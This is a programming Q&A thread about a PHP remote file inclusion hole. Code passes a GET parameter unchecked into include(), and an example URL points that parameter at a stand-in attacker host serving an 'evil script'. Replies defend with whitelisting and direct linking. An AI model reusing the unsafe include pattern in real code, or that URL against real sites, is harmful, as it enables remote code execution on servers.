# Check referrer?

Tags: php, remote-file-inclusion

I am having a problem. I have this code:

```
$theUrl = $_GET["url"];
include("$theUrl.php");
```

This gets the url, for example: `http://mywebsite.com/index.php?url=test`

But what if someone puts in:

```
http://mywebsite.com/index.php?url=http://theirwebsite.com/someEvilscript
```

How to avoid this? I want only scripts that i have on my server to be executed and not from other websites. Thanks for help.

Comment: what do u mean this won't happen?

Comment: Basically the answer is simple.  Don't do things like that.  Don't trust user input EVER...

Comment: @ajreal: it will happen.  In the very docs you posted: `if "URL fopen wrappers" are enabled in PHP (which they are in the default configuration), you can specify the file to be included using a URL`...

Comment: yes, but there must be some way to solve the problem...

Comment: `$theUrl.php = http://theirwebsite.com/someEvilscript.php` - provided your secret ending of php is identified by the Evilscript

Comment: Basically the answer is simple. include over HTTP is a **stupidest thing ever**

Comment: You're probably doing this backwards. Put your header/footer into their own files, and include those from `test.php`, and link the user directly to `mywebsite.com/test.php` rather than 'routing' everything through index.php

Answer (score 2):

One of the good way to handle this is to define a white list of file that can be included. If anything isn't in that list, it should be considered evil and never included.

For example :

```
<?php
$allowed = array('file1', 'file2', 'file3');

if (in_array($_GET["url"], $allowed)) {
    // You can include
} else {
   // Error message and dont include
}
?>
```

Note : As suggested in the comment, the allowed list can be populated dynamically by scanning allowed directory.

Comment: One option would be to scan the directory and get a list of all files first, then check to see if the requested file is in that list...  That way you don't need to hard-code the links in...

Answer (score 0):

You really shouldn't have any code that looks like that. And I mean really. What are you trying to achieve with this? I'm sure there's another way to the same without the risks (and let's say general uglyness).

Like HoLyVieR suggests, whitelisting what can be included is the key to making your current code safe.

Answer (score 0):

Why don't you just create `test.php` on your site, and use `http://mywebsite.com/test.php` in the link? This way you can include your initialization script in `test.php` (and in the other scripts) if needed.